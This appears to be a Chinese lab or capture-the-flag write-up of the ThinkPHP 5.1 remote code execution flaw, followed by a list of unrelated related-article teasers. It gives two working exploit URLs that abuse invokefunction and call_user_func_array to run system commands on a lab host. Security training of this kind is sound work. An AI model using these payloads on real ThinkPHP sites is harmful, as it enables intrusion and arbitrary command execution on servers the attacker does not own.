ThinkPHP5框架漏洞

PHP_RCE

【实验原理】

ThinkPHP5框架底层对控制器名过滤不严,可以通过url调用到ThinkPHP框架内部的敏感函数,进而导致getshell漏洞。

【实验目的】

掌握框架漏洞

【实验环境】

Windows

【实验工具】

firefox

【实验步骤】

1.根据主页提示,可以发现网页使用的是ThinkPHP框架,版本为5.1

2.此版本存在getshell漏洞(百度一下poc一抓一大把)

3.查找flag

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find%20/%20-name%20%22flag%22

4.查看flag,如图所示

http://192.168.100.161:54064/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cat%20/flag

(0)

相关推荐

  • Thinkphp 框架配置操作之配置加载与读取配置实例分析

    这篇文章主要介绍了Thinkphp 框架配置操作之配置加载与读取配置,结合实例形式分析了Thinkphp 框架配置操作中配置加载原理.操作技巧与相关注意事项,需要的朋友可以参考下本文实例讲述了Thin ...

  • PHP框架Lavarel被发现存在高危漏洞

    PHP框架Lavarel被发现存在高危漏洞

  • 要想种好“大树模式”的无花果,需要拥有整体框架思维?厉害了

    要想种好“大树模式”的无花果,需要拥有整体框架思维?厉害了

  • 【大国关系】美澳英外交政策框架下的“中国崛起” | 国政学人

    作品简介 [作者]David M. McCourt,加利福尼亚大学戴维斯分校社会学系副教授,研究方向为国际关系社会学:美国.英国和欧盟的外交政策:社科哲学. [编译]胡可怡(国政学人编译员,四川大学国 ...

  • 战略规划框架

    这些框架不仅提供了一个工具包,用于分析当前环境和确定备选方案,而且为战略的定义创建了一个完整的过程. 1.战略规划模型 在1970年代,许多大公司采用了正式的自上而下的过程,称为战略规划.在此过程中, ...

  • 战略框架:清单

    由于难以定义什么是战略,这也意味着存在许多不同的战略框架,通常会有不同的期望.公司会共同使用这些方法中的一种或多种,并且在许多情况下,每个公司都已将这些工具调整为适合其内部流程.但是,我们至少可以识别 ...

  • 如何利用IMPACT框架帮你解决业务难题?

    根据<2020年全球人才趋势>报告的数据,四分之三的人才专业人士表示,在未来五年中,人员分析将是其公司的首要任务.尽管如此,许多公司尚未做好准备.超过一半(55%)的受访者承认,他们仍然需 ...

  • 麦肯锡7S 框架

    在组织变革过程中需要使用工具的时候,我们看到了很多文章在写7S框架,大部分都是介绍一下框架内容而已,这里我们一起更加深入的把7S框架如何作用于组织变革,从哪里可以切入,之间的逻辑关系是什么一起进一步剖 ...

  • 如何突破职责分工框架“RACI”?

    RACI可以说是最受欢迎的责任计划工具,RAPID在该框架上进行了优化迭代.本文质疑这些模型的实用性,并说明如何消除复杂性,并介绍一种以批准和交付为中心的更有效的方法. 随着组织的发展,了解需要完成的 ...

  • “我不知道这是犯罪”!发现社区团购平台有漏洞,团长拉着女儿薅羊毛,两月“挣”两万

    网上下单,家门口提货, 这两年,社区团购盛行. 为了扩大市场,很多社区团购平台 也会主动邀请一些商户入驻, 请他们当团长,进行商品的收发. 但最近,陕西西安警方接到报案, 称一名社区团购平台的团长, ...